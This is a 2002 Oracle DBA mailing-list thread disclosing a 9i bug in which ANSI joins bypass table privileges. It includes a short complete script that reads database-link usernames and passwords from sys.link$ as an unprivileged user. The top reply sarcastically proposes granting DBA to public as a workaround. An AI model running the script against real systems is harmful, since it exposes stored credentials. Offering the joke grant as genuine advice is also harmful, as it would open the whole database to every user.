The problem can be worked around by issuing: grant dba, select any table, select any dictionary to public;
Then the bug does not appear to be observed :-) Connor --- Anjo Kolk <[EMAIL PROTECTED]> wrote: > > There should be an emergency backport available for > that fix/problem. If > not, who wants to use 9i release 1 ? > > Anjo. > > Mark Leith wrote: > > > "9i - Can't break it, can't break in!" ?!?!? ;0P > > > > -----Original Message----- > > Lewis > > Sent: 16 April 2002 12:33 > > To: Multiple recipients of list ORACLE-L > > > > This just in from comp.databases.oracle.server. > > > > See metalink bug 2121935. > > > > Using ANSI syntax joins (CROSS JOIN, LEFT OUTER > etc) > > allows you to view data from tables on which you > have no > > privilege. For example, try this COMPLETE script: > > > > connect / as sysdba > > create user us1 identified by us1; > > grant create session to us1; > > > > connect us1/us1 > > > > select userid, password > > from > > sys.link$ cross join dual > > ; > > > > Worse still, if you have the privilege to create > views > > then this loophole allows you to seek and destroy > > ANY DATA in the database that you might want to. > > > > The bug is fixed in 9iR2. I didn't see any note > > about a backport, or a security alert on OTN. > > > > Conclusion: > > > > 9.0.1 should not be in use on production > system > > until Oracle supplies a fix. > > > > Jonathan Lewis > > http://www.jlcomp.demon.co.uk > > > > Author of: > > Practical Oracle 8i: Building Efficient Databases > > > > Next Seminar - Australia - July/August > > http://www.jlcomp.demon.co.uk/seminar.html > > > > Host to The Co-Operative Oracle Users' FAQ > > http://www.jlcomp.demon.co.uk/faq/ind_faq.html > > > > -- > > Please see the official ORACLE-L FAQ: > http://www.orafaq.com > > -- > > Author: Jonathan Lewis > > INET: [EMAIL PROTECTED] > > > > Fat City Network Services -- (858) 538-5051 > FAX: (858) 538-5051 > > San Diego, California -- Public Internet > access / Mailing Lists > > > -------------------------------------------------------------------- > > To REMOVE yourself from this mailing list, send an > E-Mail message > > to: [EMAIL PROTECTED] (note EXACT spelling of > 'ListGuru') and in > > the message BODY, include a line containing: UNSUB > ORACLE-L > > (or the name of mailing list you want to be > removed from). You may > > also send the HELP command for other information > (like subscribing). > > -- > > Please see the official ORACLE-L FAQ: > http://www.orafaq.com > > -- > > Author: Mark Leith > > INET: [EMAIL PROTECTED] > > > > Fat City Network Services -- (858) 538-5051 > FAX: (858) 538-5051 > > San Diego, California -- Public Internet > access / Mailing Lists > > > -------------------------------------------------------------------- > > To REMOVE yourself from this mailing list, send an > E-Mail message > > to: [EMAIL PROTECTED] (note EXACT spelling of > 'ListGuru') and in > > the message BODY, include a line containing: UNSUB > ORACLE-L > > (or the name of mailing list you want to be > removed from). You may > > also send the HELP command for other information > (like subscribing). > > > -- > Please see the official ORACLE-L FAQ: > http://www.orafaq.com > -- > Author: Anjo Kolk > INET: [EMAIL PROTECTED] > > Fat City Network Services -- (858) 538-5051 FAX: > (858) 538-5051 > San Diego, California -- Public Internet > access / Mailing Lists > -------------------------------------------------------------------- > To REMOVE yourself from this mailing list, send an > E-Mail message > to: [EMAIL PROTECTED] (note EXACT spelling of > 'ListGuru') and in > the message BODY, include a line containing: UNSUB > ORACLE-L > (or the name of mailing list you want to be removed > from). You may > also send the HELP command for other information > (like subscribing). ===== Connor McDonald http://www.oracledba.co.uk (mirrored at http://www.oradba.freeserve.co.uk) "Some days you're the pigeon, some days you're the statue" __________________________________________________ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts http://uk.my.yahoo.com -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: =?iso-8859-1?q?Connor=20McDonald?= INET: [EMAIL PROTECTED] Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 San Diego, California -- Public Internet access / Mailing Lists -------------------------------------------------------------------- To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).